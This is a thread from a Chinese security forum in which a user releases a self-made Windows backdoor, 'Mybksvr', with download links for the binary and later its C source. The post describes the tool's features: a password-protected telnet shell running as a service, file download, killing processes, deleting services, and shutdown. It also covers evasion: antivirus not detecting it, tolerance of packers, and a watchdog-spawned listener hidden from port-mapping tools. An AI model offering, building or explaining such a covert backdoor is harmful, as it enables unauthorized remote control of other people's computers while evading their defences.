论坛: 原创软件 标题: 写了一个类似winshell的程序,请大家帮忙测试,谢谢! 复制本贴地址    
作者: sjdf [sjdf]    论坛用户   登录
最近写了一个类似winshell的程序,请大家帮忙测试,希望大家给我建议,谢谢。
如果大家需要源代码的话,我会发上来的。(其实没什么值得看的,丢人^_^)

下载:http://sdgf.nxm.cn/wdb/upload/mybksvrcfg.zip 

现在还不会被杀毒软件查杀,希望以后也不会…… 

简述: 

   Mybksvr的主要功能是一个telnet的服务器,支持所有标准telnet客户端软件的连接,它的运行环境为Win2000以上的系统,不支持Win9x。我在Win2000和Windows server 2003上测试通过,没有在xp下测试过,但是因为都是使用NT系统通用的接口,所以估计在xp下也可以正常工作。 
   它以服务方式运行,服务器端程序是一个只有8k大的exe文件,虽然体积很小,但是可以独立运行,不需要任何动态链接库。目前支持以下几个功能: 

1.支持多用户同时登录的具备口令认证功能的telnet服务器。 
2.下载文件。 
3.列出当前进程。 
4.结束指定进程。 
5.删除指定服务。 
6.重启和关机。 
7.终止自身运行。 
8.支持exe压缩保护软件的处理。 
9.自动安装。 
10.可自定义监听端口、口令、登录信息、服务信息等可配置项。 
11.支持退格键。 

   运行它的配置器,可以看到7个可配置项。见下图: 


其中只有登录信息可以为空。注意两个需要配置的文件名都不要和系统目录下的文件名相同,否则因为系统的文件保护功能会使服务不能正常工作。填好自定义信息后,点击生成按钮,如果配置成功,就会在当前文件夹生成一个8k的server.exe文件,否则会给出错误原因。server.exe文件可以任意改名或接受任何exe压缩保护软件的处理。 
   要在一台机器上安装这个服务,只要运行server.exe即可,然后就可以删除。如果是在控制台窗口下运行的话,还可以看到安装成功或失败的信息。在安装前,如果server.exe在系统目录下,不要将它改为和配置时的服务文件名相同,否则会安装失败。 
   在配置器里看到的那个后门文件名的意思其实是这样的,这个8k的服务程序并不直接负责端口的监听和连接工作,而是用指定的后门文件名生成一个更小的只有5k的exe文件,并运行这个程序,由这个程序来负责监听和连接工作。服务程序的工作只是每隔2秒就检查一次后门程序是否正常工作,如果没有就重新生成后门程序并启动。所以如果使用fport这样的端口进程关联程序来查看时,也不会看到服务程序。 
   要卸载这个服务,只需使用内建的删除指定服务的功能即可。输入rmsvr命令后,程序会给出提示信息,然后输入要删除的服务名即可,如果删除成功,会给出成功信息。然后可以进入shell将服务程序删除,退出shell,输入close命令关闭后门程序就可以了。 
   使用下载文件功能时,如果下载文本文件时,可能会失败,比如txt文件或htm页。不过我从来没用它下载过什么文本文件,我只下过exe文件^_^ 
   删除指定进程时,需要给出进程的PID,PID可以使用ps命令得到。




地主 发表时间: 08/08 11:36

回复: shesh [shesh]   版主   登录
支持重定向么?

就是在你的SHELL里再启动一个TELNET到别的机器?

B1层 发表时间: 08/08 12:19

回复: sjdf [sjdf]   论坛用户   登录
Sorry,暂时还没有这个功能……


B2层 发表时间: 08/08 18:00

回复: cncd [cncd]   论坛用户   登录
我看不懂,但支持原创。

B3层 发表时间: 08/09 19:51

回复: kevin007 [kevin007]   论坛用户   登录
认为值得研究学习

B4层 发表时间: 08/09 23:58

回复: HelloWorld [hello_vc]   论坛用户   登录
能否公开原码?

B5层 发表时间: 08/29 09:02

回复: sjdf [sjdf]   论坛用户   登录
这个是上面那个backdoor.exe的源代码-- http://sdgf.nxm.cn/wdb/upload/backdoor.c 

希望大家能把代码里面的漏洞或者自己添加的功能也和我共享一下,谢谢^_^

B6层 发表时间: 08/31 13:01

回复: a [tbs5201314]   论坛用户   登录
怎么杀进程呢

B7层 发表时间: 10/09 19:47

论坛: 原创软件

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号